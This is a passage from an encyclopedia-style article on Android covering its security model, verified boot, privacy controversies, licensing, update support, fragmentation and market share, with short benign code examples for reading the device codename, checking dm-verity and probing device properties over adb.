This made it difficult to port existing Linux applications or libraries to Android,[213]until version r5 of theAndroid Native Development Kitbrought support for applications written completely inCorC++.[229]Libraries written in C may also be used in applications by injection of a smallshimand usage of theJNI.[230] In current versions of Android, "Toybox", a collection of command-line utilities (mostly for use by apps, as Android does not provide acommand-line interfaceby default), is used (since the release of Marshmallow) replacing a similar "Toolbox" collection found in previous Android versions.[231] Android has another operating system, Trusty OS, within it, as a part of "Trusty" "software components supporting a Trusted Execution Environment (TEE) on mobile devices." "Trusty and the Trusty API are subject to change. [..] Applications for the Trusty OS can be written in C/C++ (C++ support is limited), and they have access to a small C library. [..] All Trusty applications are single-threaded; multithreading in Trusty userspace currently is unsupported. [..] Third-party application development is not supported in" the current version, and software running on the OS and processor for it, run the "DRMframework for protected content. [..] There are many other uses for a TEE such as mobile payments, secure banking, full-disk encryption, multi-factor authentication, device reset protection, replay-protected persistent storage, wireless display ("cast") of protected content, secure PIN and fingerprint processing, and even malware detection."[232] Android'ssource codeis released by Google under anopen-source license, and its open nature has encouraged a large community of developers and enthusiasts to use the open-source code as a foundation for community-driven projects, which deliver updates to older devices, add new features for advanced users or bring Android to devices originally shipped with other operating systems.[233]These community-developed releases often bring new features and updates to devices faster than through the official manufacturer/carrier channels, with a comparable level of quality;[234]provide continued support for older devices that no longer receive official updates; or bring Android to devices that were officially released running other operating systems, such as theHP TouchPad. Community releases often come pre-rootedand contain modifications not provided by the original vendor, such as the ability tooverclockorover/undervoltthe device's processor,[235]or security enhancements beyond what is included in the stock OS.[236] CyanogenModwas the most widely used community firmware;[237]after its abrupt discontinuation in 2016, a communityforkknown asLineageOSwas established as a spiritual continuation of the project.[238] Historically, device manufacturers and mobile carriers have typically been unsupportive of third-partyfirmwaredevelopment. Manufacturers express concern about improper functioning of devices running unofficial software and the support costs resulting from this.[239]Moreover, modified firmware such as CyanogenMod sometimes offer features, such astethering, for which carriers would otherwise charge a premium. As a result, technical obstacles including lockedbootloadersand restricted access to root permissions are common in many devices. 
However, as community-developed software has grown more popular, and following a statement by the Librarian of Congress in the United States that permits the "jailbreaking" of mobile devices,[240] manufacturers and carriers have softened their position regarding third-party development, with some, including HTC,[239] Motorola,[241] Samsung[242][243] and Sony,[244] providing support and encouraging development. As a result, over time the need to circumvent hardware restrictions to install unofficial firmware has lessened, as an increasing number of devices ship with unlocked or unlockable bootloaders, similar to the Nexus series of phones, although usually requiring that users waive their devices' warranties to do so.[239] However, despite manufacturer acceptance, some carriers in the US still require that phones be locked down.[245] Internally, Android identifies each supported device by its device codename, a short string[246] which may or may not be similar to the model name used in marketing the device. For example, the device codename of the Pixel smartphone is sailfish. The device codename is usually not visible to the end user, but is important for determining compatibility with modified Android versions. It is sometimes also mentioned in articles discussing a device, because it allows different hardware variants of a device to be distinguished, even if the manufacturer offers them under the same name. The device codename is available to running applications under android.os.Build.DEVICE,[247] as shown in the sketch after this passage. In 2020, Google launched the Android Partner Vulnerability Initiative to improve the security of Android.[248][249] They also formed an Android security team.[250] Research from the security company Trend Micro lists premium service abuse as the most common type of Android malware, where text messages are sent from infected phones to premium-rate telephone numbers without the consent or even knowledge of the user. Other malware displays unwanted and intrusive advertisements on the device, or sends personal information to unauthorised third parties.[251] Security threats on Android are reportedly growing exponentially; however, Google engineers have argued that the malware and virus threat on Android is being exaggerated by security companies for commercial reasons,[252][253] and have accused the security industry of playing on fears to sell virus protection software to users.[252] Google maintains that dangerous malware is actually extremely rare,[253] and a survey conducted by F-Secure showed that only 0.5% of Android malware reported had come from the Google Play store.[254] In 2021, journalists and researchers reported the discovery of spyware, called Pegasus, developed and distributed by a private company, which can be and has been used to infect both iOS and Android smartphones, often – partly via use of 0-day exploits – without the need for any user interaction or significant clues to the user, and which can then be used to exfiltrate data, track user locations, capture video through the camera, and activate the microphone at any time.[255] Analysis of the data traffic of popular smartphones running variants of Android found substantial by-default data collection and sharing, with no opt-out, by this pre-installed software.[256][257] Neither of these issues is addressed by security patches, nor can they be. 
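As a hedged illustration of the device codename mentioned above, the short Java sketch below reads it at runtime through the android.os.Build class; the class name and log tag are invented for the example.

    import android.os.Build;
    import android.util.Log;

    // Sketch only: logs the device codename (e.g. "sailfish" on the original Pixel).
    public final class DeviceInfo {
        private DeviceInfo() { }

        public static void logCodename() {
            Log.i("DeviceInfo", "Device codename: " + Build.DEVICE);
            Log.i("DeviceInfo", "Marketing model: " + Build.MODEL); // the name usually shown to users
        }
    }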
As part of the broader2013 mass surveillance disclosuresit was revealed in September 2013 that the American and British intelligence agencies, theNational Security Agency(NSA) andGovernment Communications Headquarters(GCHQ), respectively, have access to the user data on iPhone, BlackBerry, and Android devices. They were reportedly able to read almost all smartphone information, including SMS, location, emails, and notes.[258]In January 2014, further reports revealed the intelligence agencies' capabilities to intercept the personal information transmitted across the Internet by social networks and other popular applications such asAngry Birds, which collect personal information of their users for advertising and other commercial reasons. GCHQ has, according toThe Guardian, awiki-style guide of different apps and advertising networks, and the different data that can be siphoned from each.[259]Later that week, the Finnish Angry Birds developerRovioannounced that it was reconsidering its relationships with its advertising platforms in the light of these revelations, and called upon the wider industry to do the same.[260] The documents revealed a further effort by the intelligence agencies to intercept Google Maps searches and queries submitted from Android and other smartphones to collect location information in bulk.[259]The NSA and GCHQ insist their activities comply with all relevant domestic and international laws, although the Guardian stated "the latest disclosures could also add to mounting public concern about how the technology sector collects and uses information, especially for those outside the US, who enjoy fewer privacy protections than Americans."[259] Leaked documents codenamedVault 7and dated from 2013 to 2016, detail the capabilities of theCentral Intelligence Agency(CIA) to perform electronic surveillance andcyber warfare, including the ability to compromise the operating systems of most smartphones (including Android).[261][262] In August 2015, Google announced that devices in theGoogle Nexusseries would begin to receive monthly securitypatches. Google also wrote that "Nexus devices will continue to receive major updates for at least two years and security patches for the longer of three years from initial availability or 18 months from last sale of the device via theGoogle Store."[263][264][265]The following October, researchers at theUniversity of Cambridgeconcluded that 87.7% of Android phones in use had known but unpatchedsecurity vulnerabilitiesdue to lack of updates and support.[266][267][268]Ron Amadeo ofArs Technicawrote also in August 2015 that "Android was originally designed, above all else, to be widely adopted. Google was starting from scratch with zero percent market share, so it was happy to give up control and give everyone a seat at the table in exchange for adoption. [...] Now, though, Android has around 75–80 percent of the worldwide smartphone market—making it not just the world's most popular mobile operating system but arguably the most popular operating system, period. As such, security has become a big issue. Android still uses a software update chain-of-command designed back when the Android ecosystem had zero devices to update, and it just doesn't work".[269]Following news of Google's monthly schedule, some manufacturers, including Samsung and LG, promised to issue monthly security updates,[270]but, as noted by Jerry Hildenbrand inAndroid Centralin February 2016, "instead we got a few updates on specific versions of a small handful of models. 
And a bunch of broken promises".[271] In a March 2017 post on Google's Security Blog, Android security leads Adrian Ludwig and Mel Miller wrote that "More than 735 million devices from 200+ manufacturers received a platform security update in 2016" and that "Our carrier and hardware partners helped expand deployment of these updates, releasing updates for over half of the top 50 devices worldwide in the last quarter of 2016". They also wrote that "About half of devices in use at the end of 2016 had not received a platform security update in the previous year", stating that their work would continue to focus on streamlining the security updates program for easier deployment by manufacturers.[272] Furthermore, in a comment to TechCrunch, Ludwig stated that the wait time for security updates had been reduced from "six to nine weeks down to just a few days", with 78% of flagship devices in North America being up-to-date on security at the end of 2016.[273] Patches to bugs found in the core operating system often do not reach users of older and lower-priced devices.[274][275] However, the open-source nature of Android allows security contractors to take existing devices and adapt them for highly secure uses. For example, Samsung has worked with General Dynamics through their Open Kernel Labs acquisition to rebuild Jelly Bean on top of their hardened microvisor for the "Knox" project.[276][277] Android smartphones have the ability to report the location of Wi-Fi access points, encountered as phone users move around, to build databases containing the physical locations of hundreds of millions of such access points. These databases form electronic maps to locate smartphones, allowing them to run apps like Foursquare, Google Latitude and Facebook Places, and to deliver location-based ads.[278] Third-party monitoring software such as TaintDroid,[279] an academic research-funded project, can, in some cases, detect when personal information is being sent from applications to remote servers.[280] In 2018, the Norwegian security firm Promon unearthed a serious Android security hole that can be exploited to steal login credentials, access messages, and track location, and that could be found in all versions of Android, including Android 10. The vulnerability exploits a bug in the multitasking system, enabling a malicious app to overlay legitimate apps with fake login screens that users are not aware of when entering security credentials. Users can also be tricked into granting additional permissions to the malicious apps, which later enable them to perform various nefarious activities, including intercepting texts or calls and stealing banking credentials.[281] Avast Threat Labs also discovered that many pre-installed apps on several hundred new Android devices contain dangerous malware and adware. Some of the preinstalled malware can commit ad fraud or even take over its host device.[282][283] In 2020, the Which? watchdog reported that more than a billion Android devices released in 2012 or earlier, which was 40% of Android devices worldwide, were at risk of being hacked. This conclusion stemmed from the fact that no security updates were issued for Android versions below 7.0 in 2019. Which? collaborated with the AV Comparatives anti-virus lab to infect five phone models with malware, and it succeeded in each case. 
Google refused to comment on the watchdog's speculations.[284] On August 5, 2020, Twitter published a blog post urging its users to update their applications to the latest version with regard to a security concern that allowed others to access direct messages. A hacker could easily use the "Android system permissions" to fetch the account credentials in order to do so. The security issue exists only with Android 8 (Android Oreo) and Android 9 (Android Pie). Twitter confirmed that updating the app would restrict such practices.[285] Android applications run in a sandbox, an isolated area of the system that does not have access to the rest of the system's resources unless access permissions are explicitly granted by the user when the application is installed; however, this may not be possible for pre-installed apps. It is not possible, for example, to turn off the microphone access of the pre-installed camera app without disabling the camera completely. This also applies to Android versions 7 and 8.[286] Since February 2012, Google has used its Google Bouncer malware scanner to watch over and scan apps available in the Google Play store.[287][288] A "Verify Apps" feature was introduced in November 2012, as part of the Android 4.2 "Jelly Bean" operating system version, to scan all apps, both from Google Play and from third-party sources, for malicious behaviour.[289] Originally only doing so during installation, Verify Apps received an update in 2014 to "constantly" scan apps, and in 2017 the feature was made visible to users through a menu in Settings.[290][291] In earlier Android versions, before installing an application, the Google Play store displayed a list of the permissions an app needs to function. After reviewing these permissions, the user could choose to accept or refuse them, installing the application only if they accepted.[292] In Android 6.0 "Marshmallow", the permissions system was changed; apps are no longer automatically granted all of their specified permissions at installation time. An opt-in system is used instead, in which users are prompted to grant or deny individual permissions to an app when they are needed for the first time. Applications remember the grants, which can be revoked by the user at any time. Pre-installed apps, however, are not always part of this approach. In some cases it may not be possible to deny certain permissions to pre-installed apps, nor possible to disable them. The Google Play Services app cannot be uninstalled, nor disabled; any force-stop attempt results in the app restarting itself.[293][294] The new permissions model is used only by applications developed for Marshmallow using its software development kit (SDK), and older apps continue to use the previous all-or-nothing approach. Permissions can still be revoked for those apps, though this might prevent them from working properly, and a warning is displayed to that effect.[295][296] In September 2014, Jason Nova of Android Authority reported on a study by the German security company Fraunhofer AISEC into antivirus software and malware threats on Android. Nova wrote that "The Android operating system deals with software packages by sandboxing them; this does not allow applications to list the directory contents of other apps to keep the system safe. By not allowing the antivirus to list the directories of other apps after installation, applications that show no inherent suspicious behavior when downloaded are cleared as safe. 
If then later on parts of the app are activated that turn out to be malicious, the antivirus will have no way to know since it is inside the app and out of the antivirus' jurisdiction". The study by Fraunhofer AISEC, examining antivirus software from Avast, AVG, Bitdefender, ESET, F-Secure, Kaspersky, Lookout, McAfee (formerly Intel Security), Norton, Sophos, and Trend Micro, revealed that "the tested antivirus apps do not provide protection against customized malware or targeted attacks", and that "the tested antivirus apps were also not able to detect malware which is completely unknown to date but does not make any efforts to hide its malignity".[297] In August 2013, Google announced Android Device Manager (renamed Find My Device in May 2017),[298][299] a service that allows users to remotely track, locate, and wipe their Android device,[300][301] with an Android app for the service released in December.[302][303] In December 2016, Google introduced a Trusted Contacts app, letting users request location-tracking of loved ones during emergencies.[304][305] In 2020, Trusted Contacts was shut down and the location-sharing feature rolled into Google Maps.[306] On October 8, 2018, Google announced new Google Play store requirements to combat over-sharing of potentially sensitive information, including call and text logs. The issue stems from the fact that many apps request permissions to access users' personal information (even if this information is not needed for the app to function) and some users unquestioningly grant these permissions. Alternatively, a permission might be listed in the app manifest as required (as opposed to optional) and the app would not install unless the user grants the permission; users can withdraw any permission, even a required one, from any app in the device settings after installation, but few users do this. Google promised to work with developers and create exceptions if their apps require Phone or SMS permissions for "core app functionality". Enforcement of the new policies started on January 6, 2019, 90 days after the policy announcement of October 8, 2018. Furthermore, Google announced a new "target API level requirement" (targetSdkVersion in the manifest) of at least Android 8.0 (API level 26) for all new apps and app updates. The API level requirement might combat the practice of app developers bypassing some permission screens by specifying early Android versions that had a coarser permission model.[307][308] The Android Open Source Project implements a verified boot chain with the intention of verifying that executed code, such as the kernel or bootloader, comes from an official source instead of a malicious actor. This implementation establishes a full chain of trust, as it initially starts at a hardware level. Subsequently, the boot loader is verified and system partitions such as system and vendor are checked for integrity.[309][310] Furthermore, this process verifies that a previous version of Android has not been installed, effectively providing rollback protection, which mitigates exploits similar to a downgrade attack.[309] Android (all supported versions, as far back as version 4.4 of the Android Open Source Project) has the option to provide a verified boot chain with dm-verity. This is a feature in the Linux kernel that allows for transparent integrity checking of block devices.[311][312] This feature is designed to mitigate persistent rootkits.
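Outside Android, the same dm-verity mechanism can be driven with the veritysetup userspace tool shipped with cryptsetup. The following Python sketch is illustrative only: it assumes veritysetup is installed, root privileges, and two spare block devices; the device paths are hypothetical, the tool's output format may differ between versions, and Android's own build and boot tooling performs these steps itself rather than via a script like this.

```python
#!/usr/bin/env python3
"""Rough sketch of building and checking a dm-verity hash tree with the
`veritysetup` tool (shipped with cryptsetup). Illustrative only: device paths
are hypothetical and output parsing may need adjusting for your version."""

import re
import subprocess

DATA_DEV = "/dev/sdX1"  # hypothetical read-only partition to protect
HASH_DEV = "/dev/sdX2"  # hypothetical partition that stores the hash tree


def format_hash_tree(data_dev: str, hash_dev: str) -> str:
    """Build the Merkle hash tree and return the root hash veritysetup prints."""
    out = subprocess.run(
        ["veritysetup", "format", data_dev, hash_dev],
        check=True, capture_output=True, text=True,
    ).stdout
    match = re.search(r"Root hash:\s*([0-9a-fA-F]+)", out)
    if match is None:
        raise RuntimeError("could not find the root hash in veritysetup output")
    return match.group(1)


def verify(data_dev: str, hash_dev: str, root_hash: str) -> bool:
    """Re-check the data device against the hash tree and the trusted root hash."""
    result = subprocess.run(
        ["veritysetup", "verify", data_dev, hash_dev, root_hash],
        capture_output=True, text=True,
    )
    return result.returncode == 0


if __name__ == "__main__":
    root = format_hash_tree(DATA_DEV, HASH_DEV)
    print("trusted root hash:", root)
    # Any later change to DATA_DEV alters a leaf hash, which no longer chains
    # up to the trusted root, so this verification would fail.
    print("device intact:", verify(DATA_DEV, HASH_DEV, root))
```

On a verified-boot Android device the root hash itself is covered by a signature checked during boot, which is what anchors the chain of trust described above in hardware.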
Dependence on proprietary Google Play Services and customizations added on top of the operating system by vendors who license Android from Google is causing privacy concerns.[313][314][315] In 2019, Google was fined €50 million by the French CNIL for failing to give its users adequate information about how their data is used.[316] Two years later, in 2021, researcher Douglas Leith showed, by intercepting network traffic, that various data are sent from an Android device to Google's servers even when the phone is idle and no Google account is registered on it.[317] Several Google applications send such data, including Chrome, Messages and Docs, but YouTube is the only one that attaches a unique identifier.[318] In 2022, Leith showed that an Android phone sent various communications-related data, including data about phone calls and text messages, to Google. Timestamps, sender and receiver, plus several other details, are sent to Google Play Services infrastructure even if the "Usage and diagnostics" feature is disabled. These data are tagged with a unique identifier of the Android device and, according to the research, do not comply with the GDPR.[319] Google was sanctioned about A$60 million (approximately US$40 million) in Australia for having misled its Android customers. The case concerned misleading location-tracking settings during the 2017–2018 period and was brought by Australia's Competition & Consumer Commission. The proceedings concluded in 2021, when the court found that Google had broken consumer law with respect to about 1.3 million Google account owners.[320] A similar case regarding location tracking was brought in the U.S. in a privacy lawsuit filed by a coalition of attorneys general from 40 U.S. states; a penalty of US$391 million was agreed between Google and the states.[321] The New York Times released at that time a long-term investigation about those privacy concerns.[322] Android devices, particularly low-end and mid-range models, have been criticized for their short software support lifespans.[323] Starting in the 2010s, many users found that their devices received only one or two major updates and a limited number of security patches. This lack of long-term support stemmed from manufacturers' unwillingness to invest in costly software upgrades,[324] which were often tied to contractual agreements with chipset suppliers like Qualcomm. As a result, Android developed a reputation for rapid device obsolescence.[325][326] To address this concern, Google introduced Project Treble, a framework that separates the vendor implementation from the core operating system in order to streamline the development and deployment of Android updates, reducing manufacturers' involvement in the update process.
However, for many devices, significant improvements were still limited by the chipset manufacturers. Fairphone, a company focused on sustainability, explained that its inability to extend software support was due to Qualcomm's policies rather than its own.[327] Apple executives also highlighted Android's fragmented update ecosystem in their critiques of the platform, while quietly admitting that Qualcomm had also made it difficult for them to offer updates to the iPhone.[328] In response to this problem, several community-driven initiatives emerged to provide alternative operating systems for unsupported devices, such as LineageOS, Sailfish OS, Ubuntu Touch and PostmarketOS.[329] Starting in 2022, Samsung, the largest Android smartphone manufacturer, extended its software support commitment from the previous two years, first to four years, followed by five years in 2023 and six years in 2024.[330] Shortly thereafter, Qualcomm followed suit, extending support timelines for OEMs building phones with its chipsets, first to seven years in 2024,[331] followed by eight years in 2025. However, the commitment covered only its most powerful chipsets; Qualcomm did not make a similar commitment for chipsets used in low-end and mid-range phones.[332] These changes bring Samsung and potentially some Qualcomm-powered devices closer to competing platforms, such as Apple, whose iPhones have received four to eight years of support.[333] The source code for Android is open-source: it is developed in private by Google, with the source code released publicly when a new version of Android is released. Google publishes most of the code (including network and telephony stacks) under the non-copyleft Apache License version 2.0, which allows modification and redistribution.[334][335] The license does not grant rights to the "Android" trademark, so device manufacturers and wireless carriers have to license it from Google under individual contracts. Associated Linux kernel changes are released under the copyleft GNU General Public License version 2, developed by the Open Handset Alliance, with the source code publicly available at all times.[336] The only Android release which was not immediately made available as source code was the tablet-only 3.0 Honeycomb release. The reason, according to Andy Rubin in an official Android blog post, was that Honeycomb had been rushed into production for the Motorola Xoom,[337] and they did not want third parties creating a "really bad user experience" by attempting to put onto smartphones a version of Android intended for tablets.[338] Only the base Android operating system (including some applications) is open-source software, whereas most Android devices ship with a substantial amount of proprietary software, such as Google Mobile Services, which includes applications such as Google Play Store, Google Search, and Google Play Services – a software layer that provides APIs for integration with Google-provided services, among others.
These applications must be licensed from Google by device makers, and can only be shipped on devices which meet its compatibility guidelines and other requirements.[118]Custom, certified distributions of Android produced by manufacturers (such asSamsung Experience) may also replace certain stock Android apps with their own proprietary variants and add additional software not included in the stock Android operating system.[117]With the advent of theGoogle Pixelline of devices, Google itself has also made specific Android features timed or permanent exclusives to the Pixel series.[339][340]There may also be "binary blob"driversrequired for certain hardware components in the device.[117][171]The best known fully open source Android services are theLineageOSdistribution andMicroGwhich acts as an open source replacement of Google Play Services. Richard Stallmanand theFree Software Foundationhave been critical of Android and have recommended the usage of alternatives such asReplicant, because drivers and firmware vital for the proper functioning of Android devices are usually proprietary, and because the Google Play Store application can forcibly install or uninstall applications and, as a result, invite non-free software. In both cases, the use of closed-source software causes the system to become vulnerable tobackdoors.[341][342] It has been argued that because developers are often required to purchase the Google-branded Android license, this has turned the theoretically open system into afreemiumservice.[343]: 20 Google licenses their Google Mobile Services software, along with the Android trademarks, only to hardware manufacturers for devices that meet Google's compatibility standards specified in the Android Compatibility Program document.[344]Thus, forks of Android that make major changes to the operating system itself do not include any of Google's non-free components, stay incompatible with applications that require them, and must ship with an alternative software marketplace in lieu of Google Play Store.[117]A prominent example of such an Android fork isAmazon'sFire OS, which is used on theKindle Fireline of tablets, and oriented toward Amazon services.[117]The shipment of Android devices without GMS is also common in mainlandChina, as Google does not do business there.[345][346][347] In 2014, Google also began to require that all Android devices which license the Google Mobile Services software display a prominent "Powered by Android" logo on their boot screens.[118]Google has also enforced preferential bundling and placement of Google Mobile Services on devices, including mandated bundling of the entire main suite of Google applications, mandatory placement of shortcuts to Google Search and the Play Store app on or near the main home screen page in its default configuration,[348]and granting a larger share of search revenue to OEMs who agree to not include third-party app stores on their devices.[349]In March 2018, it was reported that Google had begun to block "uncertified" Android devices from using Google Mobile Services software, and display a warning indicating that "the device manufacturer has preloaded Google apps and services without certification from Google". 
Users of custom ROMs can register their device ID to their Google account to remove this block.[350] Some stock applications and components in AOSP code that were formerly used by earlier versions of Android, such as Search, Music, Calendar, and the location API, wereabandonedby Google in favor ofnon-freereplacements distributed through Play Store (Google Search, YouTube Music, and Google Calendar) andGoogle Play Services, which are no longer open-source. Moreover, open-source variants of some applications also exclude functions that are present in their non-free versions.[117][351][352][353]These measures are likely intended to discourage forks and encourage commercial licensing in line with Google requirements, as the majority of the operating system's core functionality is dependent on proprietary components licensed exclusively by Google, and it would take significant development resources to develop an alternative suite of software and APIs to replicate or replace them. Apps that do not use Google components would also be at a functional disadvantage, as they can only use APIs contained within the OS itself. In turn, third-party apps may have dependencies on Google Play Services.[354] Members of the Open Handset Alliance, which include the majority of Android OEMs, are also contractually forbidden from producing Android devices based on forks of the OS;[117][355]in 2012,Acer Inc.was forced by Google to halt production on a device powered byAlibaba Group'sAliyun OSwith threats of removal from the OHA, as Google deemed the platform to be an incompatible version of Android. Alibaba Group defended the allegations, arguing that the OS was a distinct platform from Android (primarily usingHTML5apps), but incorporated portions of Android's platform to allow backwards compatibility with third-party Android software. Indeed, the devices did ship with an application store which offered Android apps; however, the majority of them werepirated.[356][357][358] Android received a lukewarm reaction when it was unveiled in 2007. Although analysts were impressed with the respected technology companies that had partnered with Google to form the Open Handset Alliance, it was unclear whether mobile phone manufacturers would be willing to replace their existing operating systems with Android.[359]The idea of an open-source, Linux-baseddevelopment platformsparked interest,[360]but there were additional worries about Android facing strong competition from established players in the smartphone market, such as Nokia and Microsoft, and rival Linux mobile operating systems that were in development.[361]These established players were skeptical: Nokia was quoted as saying "we don't see this as a threat", and a member of Microsoft's Windows Mobile team stated "I don't understand the impact that they are going to have."[362] Since then Android has grown to become the most widely used smartphone operating system[363][364]and "one of the fastest mobile experiences available".[365]Reviewers have highlighted the open-source nature of the operating system as one of its defining strengths, allowing companies such as Nokia (Nokia X family),[366]Amazon (Kindle Fire),Barnes & Noble(Nook),Ouya,Baiduand others toforkthe software and release hardware running their own customised version of Android. 
As a result, it has been described by technology websiteArs Technicaas "practically the default operating system for launching new hardware" for companies without their own mobile platforms.[363]This openness and flexibility is also present at the level of the end user: Android allows extensive customisation of devices by their owners and apps are freely available from non-Google app stores and third party websites. These have been cited as among the main advantages of Android phones over others.[363][367] Despite Android's popularity, including an activation rate three times that of iOS, there have been reports that Google has not been able to leverage their other products and web services successfully to turn Android into the money maker that analysts had expected.[368]The Vergesuggested that Google is losing control of Android due to the extensive customization and proliferation of non-Google apps and services – Amazon's Kindle Fire line usesFire OS, a heavily modified fork of Android which does not include or support any of Google's proprietary components, and requires that users obtain software from its competingAmazon Appstoreinstead of Play Store.[117]In 2014, in an effort to improve prominence of the Android brand, Google began to require that devices featuring its proprietary components display an Android logo on the boot screen.[118] Android has suffered from "fragmentation",[369]a situation where the variety of Android devices, in terms of both hardware variations and differences in the software running on them, makes the task of developing applications that work consistently across the ecosystem harder than rival platforms such as iOS where hardware and software varies less. For example, according to data fromOpenSignalin July 2013, there were 11,868 models of Android devices, numerous screen sizes and eight Android OS versions simultaneously in use, while the large majority of iOS users have upgraded to the latest iteration of that OS.[370]Critics such asApple Insiderhave asserted that fragmentation via hardware and software pushed Android's growth through large volumes of low end, budget-priced devices running older versions of Android. They maintain this forces Android developers to write for the "lowest common denominator" to reach as many users as possible, who have too little incentive to make use of the latest hardware or software features only available on a smaller percentage of devices.[371]However, OpenSignal, who develops both Android and iOS apps, concluded that although fragmentation can make development trickier, Android's wider global reach also increases the potential reward.[370] Android is the most used operating system on phones in virtually all countries, with some countries, such as India, having over 96% market share.[372]On tablets, usage is more even, as iOS is a bit more popular globally. 
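One practical consequence of the fragmentation described above is that developers and testers constantly have to check exactly which Android version, API level and display configuration a given device exposes. As a rough, unofficial illustration, the following Python sketch reads a few such parameters over adb (the debugging tool shipped in the Android SDK platform-tools); it assumes a single attached device, and the property names used are standard Android system properties.

```python
#!/usr/bin/env python3
"""Probe a connected Android device for the version and display parameters
that vary so widely across the ecosystem. Assumes `adb` from the Android SDK
platform-tools is on PATH and exactly one device is attached."""

import subprocess


def adb_shell(*args: str) -> str:
    """Run an `adb shell` command and return its trimmed standard output."""
    return subprocess.run(
        ["adb", "shell", *args], check=True, capture_output=True, text=True
    ).stdout.strip()


if __name__ == "__main__":
    info = {
        "Android version": adb_shell("getprop", "ro.build.version.release"),
        "API level":       adb_shell("getprop", "ro.build.version.sdk"),
        "Display size":    adb_shell("wm", "size"),     # e.g. "Physical size: 1080x2400"
        "Display density": adb_shell("wm", "density"),  # e.g. "Physical density: 440"
    }
    for key, value in info.items():
        print(f"{key}: {value}")
```

Device farms and compatibility test suites automate this kind of per-model probing at much larger scale.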
Research company Canalys estimated in the second quarter of 2009, that Android had a 2.8% share of worldwidesmartphoneshipments.[373]By May 2010, Android had a 10% worldwide smartphone market share, overtakingWindows Mobile,[374]whilst in the US Android held a 28% share, overtakingiPhone OS.[375]By the fourth quarter of 2010, its worldwide share had grown to 33% of the market becoming the top-selling smartphone platform,[376]overtakingSymbian.[377]In the US it became the top-selling platform in April 2011, overtakingBlackBerry OSwith a 31.2% smartphone share, according tocomScore.[378] By the third quarter of 2011,Gartnerestimated that more than half (52.5%) of the smartphone sales belonged to Android.[379]By the third quarter of 2012 Android had a 75% share of the global smartphone market according to the research firm IDC.[380] In July 2011, Google said that 550,000 Android devices were being activated every day,[381]up from 400,000 per day in May,[382]and more than 100 million devices had been activated[383]with 4.4% growth per week.[381]In September 2012, 500 million devices had been activated with 1.3 million activations per day.[384][385]In May 2013, at Google I/O, Sundar Pichai announced that 900 million Android devices had been activated.[386] Android market share varies by location. In July 2012, "mobile subscribers aged 13+" in the United States using Android were up to 52%,[387]and rose to 90% in China.[388]During the third quarter of 2012, Android's worldwide smartphone shipment market share was 75%,[380]with 750 million devices activated in total. In April 2013, Android had 1.5 million activations per day.[385]As of May 2013,[update]48 billion application ("app") installation have been performed from the Google Play store,[389]and by September 2013, one billion Android devices had been activated.[390] As of August 2020,[update]theGoogle Playstore had over 3 million Android applications published,[119][391]and as of May 2016,[update]apps had been downloaded more than 65 billion times.[392]The operating system's success has made it a target for patent litigation as part of the so-called "smartphone wars" between technology companies.[393][394] Android devices account for more than half of smartphone sales in most markets, including the US, while "only in Japan was Apple on top" (September–November 2013 numbers).[395]At the end of 2013, over 1.5 billion Android smartphones had been sold in the four years since 2010,[396][397]making Android the most sold phone and tablet OS. Three billion Android smartphones were estimated to be sold by the end of 2014 (including previous years). According to Gartner research company, Android-based devices outsold all contenders, every year since 2012.[398]In 2013, it outsold Windows 2.8:1 or by 573 million.[399][400][401]As of 2015,[update]Android has the largestinstalled baseof all operating systems;[22]Since 2013, devices running it also sell more than Windows, iOS and Mac OS X devices combined.[402] According toStatCounter, which tracks only the use for browsing the web, Android is the most popular mobile operating system since August 2013.[403]Android is the most popular operating system for web browsing in India and several other countries (e.g. virtually all of Asia, with Japan and North Korea exceptions). 
According to StatCounter, Android is most used on phones in all African countries, and it stated "mobile usage has already overtaken desktop in several countries including India, South Africa and Saudi Arabia",[404]with all countries in Africa having done so already in which mobile (including tablets) usage is at 90.46% (Android only, accounts for 75.81% of all use there).[405][406] While Android phones in theWestern worldalmost always include Google's proprietary code (such as Google Play) in the otherwise open-source operating system, Google's proprietary code and trademark is increasingly not used in emerging markets; "The growth ofAOSPAndroid devices goes way beyond just China [..] ABI Research claims that 65 million devices shipped globally with open-source Android in the second quarter of [2014], up from 54 million in the first quarter"; depending on country, percent of phones estimated to be based only on AOSP source code, forgoing the Android trademark: Thailand (44%), Philippines (38%), Indonesia (31%), India (21%), Malaysia (24%), Mexico (18%), Brazil (9%).[407] According to a January 2015Gartnerreport, "Android surpassed a billion shipments of devices in 2014, and will continue to grow at a double-digit pace in 2015, with a 26 percent increase year over year." This made it the first time that any general-purpose operating system has reached more than one billion end users within a year: by reaching close to 1.16 billion end users in 2014, Android shipped over four times more thaniOSandOS Xcombined, and over three times more thanMicrosoft Windows. Gartner expected the whole mobile phone market to "reach two billion units in 2016", including Android.[408]Describing the statistics, Farhad Manjoo wrote inThe New York Timesthat "About one of every two computers sold today is running Android. [It] has become Earth's dominant computing platform."[22] According to aStatistica's estimate, Android smartphones had an installed base of 1.8 billion units in 2015, which was 76% of the estimated total number of smartphones worldwide.[409][410][c]Android has the largest installed base of anymobile operating systemand, since 2013, the highest-selling operating system overall[399][402][412][413][414]with sales in 2012, 2013 and 2014[415]close to the installed base of all PCs.[416] In the second quarter of 2014, Android's share of the global smartphone shipment market was 84.7%, a new record.[417][418]This had grown to 87.5% worldwide market share by the third quarter of 2016,[419]leaving main competitoriOSwith 12.1% market share.[420] According to an April 2017StatCounterreport, Android overtook Microsoft Windows to become the most popular operating system for total Internet usage.[421][422]It has maintained the plurality since then.[423] In September 2015,Googleannounced that Android had 1.4 billion monthly active users.[424][425]This changed to 2 billion monthly active users in May 2017.[426][427] Despite its success on smartphones, initially Android tablet adoption was slow,[428]then later caught up with the iPad, in most countries. One of the main causes was thechicken or the eggsituation where consumers were hesitant to buy an Android tablet due to a lack of high quality tablet applications, but developers were hesitant to spend time and resources developing tablet applications until there was a significant market for them.[429][430]The content and app "ecosystem" proved more important than hardwarespecsas the selling point for tablets. 
